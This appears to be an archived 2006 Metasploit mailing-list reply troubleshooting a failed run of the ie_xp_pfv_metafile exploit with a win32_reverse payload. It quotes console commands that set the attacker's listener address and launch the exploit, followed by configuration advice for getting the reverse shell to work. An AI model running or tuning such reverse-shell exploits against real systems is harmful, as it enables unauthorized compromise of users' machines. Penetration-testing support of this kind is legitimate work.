Metasploit mailing list archives

ie_xp_pfv_metafile doesn't work


From: hdm at metasploit.com (H D Moore)
Date: Wed, 1 Mar 2006 11:05:11 -0600

On Wednesday 01 March 2006 10:37, Nathalie Baracaldo ?ngel wrote:
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.0.100
LHOST -> 192.168.0.100
msf ie_xp_pfv_metafile(win32_reverse) > set HTTPHOST 192.168.0.101
HTTPHOST -> 192.168.0.101
msf ie_xp_pfv_metafile(win32_reverse) > exploit
[*] Starting Reverse Handler.
[-] Failed to create local HTTP listener on 8080
[*] Exiting Reverse Handler.
msf ie_xp_pfv_metafile(win32_reverse) >

Why is this happening?

The HTTPHOST/LHOST values should always be the IP address of the attacking 
system, the only time you need to mess with HTTPHOST is when you are 
running the exploit from behind a NAT gateway. In this case, you are 
trying to set the HTTPHOST value to an address the attacking system does 
not have. Does the client system open up the Picture and Fax Viewer? Does 
the attacking system allow connections from the VirtualPC system? 

-HD



Current thread: